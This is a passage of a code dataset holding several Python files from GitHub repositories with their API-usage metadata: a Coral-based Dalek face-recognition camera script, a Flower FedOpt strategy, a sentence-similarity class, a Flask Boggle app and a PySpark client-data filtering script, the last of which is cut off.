"pygame.image.load", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 64, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 98, "usage_type": "attribute"}, {"api_name": "math.atan2", "line_number": 98, "usage_type": "call"}, {"api_name": "pygame.transform.rotozoom", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.transform.rotozoom", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 110, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 110, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 113, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 116, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 117, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 151, "usage_type": "attribute"}, {"api_name": "math.atan2", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.transform.rotozoom", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 161, "usage_type": "call"}, {"api_name": 
"pygame.image", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 162, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 169, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 170, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 170, "usage_type": "attribute"}, {"api_name": "pygame.math.Vector2", "line_number": 171, "usage_type": "call"}, {"api_name": "pygame.math", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 185, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pygame.time.delay", "line_number": 186, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 191, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 191, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 192, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 193, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 193, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 195, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 205, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 205, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 208, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 216, "usage_type": "call"}, {"api_name": "pygame.exit", "line_number": 220, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 221, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 225, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 226, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 227, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 231, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 239, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 239, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 246, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 246, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 247, "usage_type": "attribute"}, {"api_name": 
"pygame.quit", "line_number": 248, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 261, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 261, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 265, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 265, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 287, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 287, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 346, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 346, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 352, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 354, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 356, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 358, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 360, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 378, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 378, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 379, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 380, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 384, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 386, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 388, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 390, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 392, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 397, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 399, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 401, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 404, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 407, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 409, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 411, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 413, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 415, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 418, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 420, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 422, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 424, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 427, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 427, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 431, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 431, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 432, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 432, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 433, "usage_type": "call"}, {"api_name": "pygame.image", 
"line_number": 433, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 434, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 434, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 440, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 440, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 442, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 442, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 446, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 454, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 458, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 459, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 462, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 462, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 463, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 464, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 465, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 466, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 470, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 470, "usage_type": "attribute"}]}
+{"seq_id": "34839705788", "text": "import time\nimport sys\nimport argparse\n\n# import image and DL processing\nimport cv2\nimport numpy as np\nimport dlib\nfrom random import randrange\n# from edgetpu.detection.engine import DetectionEngine\nfrom pycoral.adapters import common\nfrom pycoral.adapters import detect\nfrom pycoral.utils.edgetpu import make_interpreter\nfrom scipy.interpolate import UnivariateSpline\n\nfrom imutils.video import VideoStream\nfrom PIL import Image, ImageDraw\n\n# import local helper classes\nfrom faceextractor import FaceDataExtractor\nfrom recognizer import FaceRecognizer\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-o\", \"--output\", default=False, action=\"store_true\",\n\thelp=\"Display dalek PoV\")\nap.add_argument(\"-f\", \"--face\", type=float, default=0.7,\n\thelp=\"Face detection certainty\")\nap.add_argument(\"-r\", \"--recognize\", type=float, default=0.7,\n\thelp=\"Face recognition certainty\")\nargs = vars(ap.parse_args())\n\nprint(args)\n\nprint(\"Loading face detection engine...\")\ninterpreter = make_interpreter(\"/home/pi/coral-dalek/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite\")\ninterpreter.allocate_tensors()\n\nprint(\"Loading face landmark detection engine...\")\nshape_pred = dlib.shape_predictor(\"./shape_predictor_5_face_landmarks.dat\")\nface_ext = FaceDataExtractor()\nprint(\"Loading face recognitn engine...\")\nfacerec = dlib.face_recognition_model_v1(\"./dlib_face_recognition_resnet_model_v1.dat\")\nface_recog = FaceRecognizer()\n\n# https://www.askaswiss.com/2016/02/how-to-manipulate-color-temperature-opencv-python.html\n\nif args['output']:\n pov = 0\n overlay=[]\n overlay.append(cv2.imread('dalekpov-a.png'))\n overlay.append(cv2.imread('dalekpov-b.png'))\n overlay.append(cv2.imread('dalekpov-c.png'))\n\n def create_transform(x, y):\n spl = UnivariateSpline(x, y)\n return spl(range(256))\n\n inc_col = create_transform([0, 64, 128, 192, 256],[150, 175, 200, 225, 256])\n dec_col = create_transform([0, 64, 128, 192, 256],[28, 64, 90, 110, 128])\n\nprint(\"Starting video capture\")\n\nvc = cv2.VideoCapture(0)\nif not vc.isOpened():\n print(\"Cannot open USB camera.\")\n exit()\n\ncap_width = vc.get(cv2.CAP_PROP_FRAME_WIDTH)\ncap_height = vc.get(cv2.CAP_PROP_FRAME_HEIGHT)\ncap_fps = vc.get(cv2.CAP_PROP_FPS)\nprint(cap_width,\" x \", cap_height,\" @ \", cap_fps)\n\nprint(\"Entering main loop, press CTRL+C to exit...\")\nwhile True:\n try:\n ret, frame = vc.read()\n if not ret:\n print(\"No frame received from camera; exiting...\")\n break\n # Convert frame from color_coverted = cv2.cvtColor(opencv_image, cv2.COLOR_BGR2RGB)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(frame)\n _, scale = common.set_resized_input(\n interpreter, image.size, lambda size: image.resize(size, Image.ANTIALIAS))\n interpreter.invoke()\n face_box_list = detect.get_objects(interpreter, args['face'], scale)\n\n draw = ImageDraw.Draw(image)\n for face in face_box_list:\n bbox = face.bbox\n draw.rectangle([(bbox.xmin, bbox.ymin), (bbox.xmax, bbox.ymax)], outline='black')\n box = dlib.rectangle(left = bbox.xmin,\n right = bbox.xmax,\n top = bbox.ymin,\n bottom = bbox.ymax)\n shape = shape_pred(frame, box)\n if shape:\n face_chip_img = dlib.get_face_chip(frame, shape)\n face_descriptor = facerec.compute_face_descriptor(face_chip_img)\n name = face_recog.recognize_face(face_descriptor, threshold = args['recognize'])\n if name:\n if output:\n draw.text((bbox.xmin, 
bbox.ymin - 20), name, fill='black')\n else:\n print(name)\n \n if args['output']:\n displayImage = np.asarray(image)\n blue, green, red = cv2.split(displayImage)\n red = cv2.LUT(red, dec_col).astype(np.uint8)\n blue = cv2.LUT(blue, dec_col).astype(np.uint8)\n green = cv2.LUT(green, inc_col).astype(np.uint8)\n displayImage = cv2.merge((red, green, blue))\n\n # displayImage = cv2.cvtColor(displayImage, cv2.COLOR_BGR2GRAY)\n if (randrange(10) > 6): pov = randrange(3)\n displayImage = cv2.addWeighted(displayImage,0.8,overlay[pov],0.2,0)\n cv2.imshow('Dalek Fry Eyestalk PoV', displayImage)\n if cv2.waitKey(1) == ord('q'):\n raise KeyboardInterrupt\n except KeyboardInterrupt:\n vc.release()\n cv2.destroyAllWindows()\n print(\"Program halted by CTRL+C\")\n sys.exit(0)", "repo_name": "hopkira/coral-dalek", "sub_path": "new_vision.py", "file_name": "new_vision.py", "file_ext": "py", "file_size_in_byte": 4719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 24, "usage_type": "call"}, {"api_name": "pycoral.utils.edgetpu.make_interpreter", "line_number": 36, "usage_type": "call"}, {"api_name": "dlib.shape_predictor", "line_number": 40, "usage_type": "call"}, {"api_name": "faceextractor.FaceDataExtractor", "line_number": 41, "usage_type": "call"}, {"api_name": "dlib.face_recognition_model_v1", "line_number": 43, "usage_type": "call"}, {"api_name": "recognizer.FaceRecognizer", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.interpolate.UnivariateSpline", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 82, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "pycoral.adapters.common.set_resized_input", "line_number": 84, "usage_type": "call"}, {"api_name": "pycoral.adapters.common", "line_number": 84, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 85, "usage_type": "name"}, {"api_name": "pycoral.adapters.detect.get_objects", "line_number": 87, "usage_type": "call"}, {"api_name": "pycoral.adapters.detect", "line_number": 87, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 89, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 89, "usage_type": "name"}, {"api_name": "dlib.rectangle", "line_number": 93, "usage_type": "call"}, {"api_name": "dlib.get_face_chip", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.LUT", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 111, 
"usage_type": "attribute"}, {"api_name": "cv2.LUT", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 112, "usage_type": "attribute"}, {"api_name": "cv2.LUT", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.merge", "line_number": 114, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 118, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 120, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 126, "usage_type": "call"}]}
+{"seq_id": "3927966183", "text": "# ! This code has been copied from https://github.com/adap/flower/blob/main/src/py/flwr/server/strategy/fedopt.py commit 59a32d5\n# and removed the annoying requirement of having to pass the initialized model at construction time\n\nfrom tkinter import E\nfrom typing import Callable, Dict, Optional, Tuple\n\nfrom flwr.common import Parameters, Scalar, Weights, parameters_to_weights\n\nfrom flwr.server.strategy import FedAvg\n\nimport pickle\n\nclass FedOpt(FedAvg):\n \"\"\"Configurable FedAdagrad strategy implementation.\"\"\"\n\n # pylint: disable=too-many-arguments,too-many-instance-attributes,too-many-locals\n def __init__(\n self,\n *,\n fraction_fit: float = 0.1,\n fraction_eval: float = 0.1,\n min_fit_clients: int = 2,\n min_eval_clients: int = 2,\n min_available_clients: int = 2,\n eval_fn: Optional[\n Callable[[Weights], Optional[Tuple[float, Dict[str, Scalar]]]]\n ] = None,\n on_fit_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n on_evaluate_config_fn: Optional[Callable[[int], Dict[str, Scalar]]] = None,\n accept_failures: bool = True,\n initial_parameters: Parameters,\n eta: float = 1e-1,\n eta_l: float = 1e-1,\n beta_1: float = 0.0,\n beta_2: float = 0.0,\n tau: float = 1e-9,\n ) -> None:\n \"\"\"Federated Optim strategy interface.\n Implementation based on https://arxiv.org/abs/2003.00295\n Args:\n fraction_fit (float, optional): Fraction of clients used during\n training. Defaults to 0.1.\n fraction_eval (float, optional): Fraction of clients used during\n validation. Defaults to 0.1.\n min_fit_clients (int, optional): Minimum number of clients used\n during training. Defaults to 2.\n min_eval_clients (int, optional): Minimum number of clients used\n during validation. Defaults to 2.\n min_available_clients (int, optional): Minimum number of total\n clients in the system. Defaults to 2.\n eval_fn (Callable[[Weights], Optional[Tuple[float, float]]], optional):\n Function used for validation. Defaults to None.\n on_fit_config_fn (Callable[[int], Dict[str, str]], optional):\n Function used to configure training. Defaults to None.\n on_evaluate_config_fn (Callable[[int], Dict[str, str]], optional):\n Function used to configure validation. Defaults to None.\n accept_failures (bool, optional): Whether or not accept rounds\n containing failures. Defaults to True.\n initial_parameters (Parameters): Initial set of parameters from the server.\n eta (float, optional): Server-side learning rate. Defaults to 1e-1.\n eta_l (float, optional): Client-side learning rate. Defaults to 1e-1.\n beta_1 (float, optional): Momentum parameter. Defaults to 0.0.\n beta_2 (float, optional): Second moment parameter. Defaults to 0.0.\n tau (float, optional): Controls the algorithm's degree of adaptability.\n Defaults to 1e-9.\n \"\"\"\n super().__init__(\n fraction_fit=fraction_fit,\n fraction_eval=fraction_eval,\n min_fit_clients=min_fit_clients,\n min_eval_clients=min_eval_clients,\n min_available_clients=min_available_clients,\n eval_fn=eval_fn,\n on_fit_config_fn=on_fit_config_fn,\n on_evaluate_config_fn=on_evaluate_config_fn,\n accept_failures=accept_failures,\n initial_parameters=initial_parameters,\n )\n\n if initial_parameters:\n self.current_weights = parameters_to_weights(initial_parameters)\n else:\n self.current_weights = None\n # ! 
this will trigger a crash if the user doesn't copy the server weights before the 1st round begins\n        print('type of current weights:',type(self.current_weights))\n        self.eta = eta\n        self.eta_l = eta_l\n        self.tau = tau\n        self.beta_1 = beta_1\n        self.beta_2 = beta_2\n\n    def __repr__(self) -> str:\n        rep = f\"FedOpt(accept_failures={self.accept_failures})\"\n        return rep", "repo_name": "royson/fedl2p", "sub_path": "src/server/strategies/fedopt.py", "file_name": "fedopt.py", "file_ext": "py", "file_size_in_byte": 4285, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flwr.server.strategy.FedAvg", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 26, "usage_type": "name"}, {"api_name": "flwr.common.Weights", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 26, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.Parameters", "line_number": 31, "usage_type": "name"}, {"api_name": "flwr.common.parameters_to_weights", "line_number": 81, "usage_type": "call"}]}
+{"seq_id": "5378424986", "text": "from collections import defaultdict\n\nclass SentenceSimilarity:\n def areSentencesSimilar(self, words1: 'List[str]', words2: 'List[str]', pairs: 'List[List[str]]') -> bool:\n if len(words1) != len(words2): return False\n p_dict = defaultdict(set)\n for p1, p2 in pairs:\n p_dict[p1].add(p2)\n p_dict[p2].add(p1)\n for i in range(len(words1)):\n if words1[i] == words2[i] or\\\n (words1[i] in p_dict and words2[i] in p_dict[words1[i]]):\n continue\n return False\n return True\n", "repo_name": "yokolet/tranquil-beach-python", "sub_path": "tranquil-beach/sorting_searching/sentence_similarity.py", "file_name": "sentence_similarity.py", "file_ext": "py", "file_size_in_byte": 574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "71517699048", "text": "from flask import Flask, request, render_template, redirect, flash, session, jsonify\n# from flask_debugtoolbar import DebugToolbarExtension\n\nfrom boggle import Boggle\n\nboggle_game = Boggle()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'folke'\n\n# debug = DebugToolbarExtension(app)\n\n@app.route('/')\ndef start_game():\n \"\"\" Generate game html\"\"\"\n\n # Create board and store it in session\n session['board'] = boggle_game.make_board()\n\n # If player has played before, add session info for highest score and times played.\n highscore = session.get('highscore', 0)\n times_played = session.get('times_played', 0)\n\n return render_template('game.html', board = session['board'], times_played = times_played, highscore = highscore)\n \n@app.route('/check-word')\ndef check_word():\n word = request.args['word']\n check_word = boggle_game.check_valid_word(session['board'], word)\n\n return ({'result': check_word})\n\n\n@app.route('/gameover', methods=['POST'])\ndef get_score():\n \"\"\" Add highscore and times_played to session \"\"\"\n\n # If highscore exists, check if current score from front-end is higher or not.\n if 'highscore' in session:\n if session['highscore'] < request.json['score']:\n session['highscore'] = request.json['score']\n else:\n session['highscore'] = request.json['score']\n\n # Increment times_played by one\n session['times_played'] = session.get('times_played', 0) + 1\n\n return ''", "repo_name": "f-westergren/flask-boggle", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1455, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "boggle.Boggle", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "5426809969", "text": "import argparse\nimport os\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col\nfrom pyspark.sql import DataFrame\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nfrom typing import TypeVar, Sequence\nimport sys\n\nos.environ['PYSPARK_PYTHON'] = sys.executable\nos.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable\n\nT = TypeVar('T')\nC = TypeVar('C')\nD = TypeVar('D')\n\nlogger = logging.getLogger(\"KommatiPara-Log\")\nlogger.setLevel(logging.DEBUG)\n\nos.makedirs(\"logs\", exist_ok=True)\n\nhandler = RotatingFileHandler(\"logs/kommatipara.log\", maxBytes=200, backupCount=3)\nlogger.addHandler(handler)\n\nsc = SparkSession.builder.master(\"local\").appName(\"KommatiPara\").getOrCreate()\n\ndef load_csv(filepath: str) -> DataFrame:\n \"\"\"\n Load csv from a given filepath.\n\n :param str filepath: path to the .csv file\n :return: pyspark dataframe\n \"\"\"\n if os.path.exists(filepath):\n df = sc.read.option(\"header\", \"true\").csv(filepath)\n logger.debug(f\"Data loaded: {filepath}\")\n #log dataset loaded\n return df\n \n logger.error(f\"Filepath doesn't exist: {filepath}\")\n raise TypeError(f\"Filepath doesn't exist {filepath}\")\n\ndef filter_data(df: D, filters: Sequence[T], colname: C) -> D:\n \"\"\"\n Filters data given list of filters and a column name.\n\n :param dataframe df: dataframe to be filtered\n :param list filters: list of countries to keep\n :param colname str colname: name of the column for the filter criteria\n :return: filtered dataset\n \"\"\"\n logger.debug(f\"Filtering column: {colname} values: {filters}\")\n return df.filter(col(colname).isin(filters))\n\ndef remove_personal_info(df: DataFrame, personal_info: Sequence[str]) -> DataFrame:\n \"\"\"\n Drops personal info from the dataframe\n :param dataframe df: dataframe where to remove personal info\n :param personal_info list: list of columns to drop\n :return modified dataframe\n \"\"\"\n return df.drop(*personal_info)\n\ndef rename_columns(df: D, columns_to_rename: Sequence[T]) -> D:\n \"\"\"\n Renames columns from dataframe.\n\n :param dataframe df: dataframe where to rename\n :param list columns_to_rename: list of tuples (old name, new name)\n :return: dataframe with renamed columns\n \"\"\"\n logger.debug(f\"Data to be renamed: {columns_to_rename}\")\n for (old,new) in columns_to_rename:\n if not isinstance(new, str):\n logger.error(f\"New column is not a string: {type(new)}\")\n raise TypeError(f\"New column name must be a string, not {type(new)}\")\n df = df.withColumnRenamed(old, new)\n\n return df\n\ndef save_csv_output_file(df: DataFrame, path: str) -> None:\n \"\"\"\n Save output inside the path folder as csv and overwite if already exists\n :param dataframe df: dataframe to be saved\n :param string path: path to the folder where to save the output\n :return void\n \"\"\"\n\n df.write.option(\"header\",True).mode('overwrite').csv(path)\n logger.debug(f\"Output saved on: {path}\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--d1', type=str, required=True, help='path to the first dataset')\n parser.add_argument('--d2', type=str, required=True, help='path to the second dataset')\n parser.add_argument('--f','--list', nargs='+', help='Filter on Country', required=True)\n\n opt = parser.parse_args()\n\n logger.debug(f\"Arguments parsed: {opt.d1}, {opt.d2}, {opt.f}\")\n\n df_clients = load_csv(opt.d1)\n df_fin = load_csv(opt.d2)\n\n df_clients = filter_data(df=df_clients, 
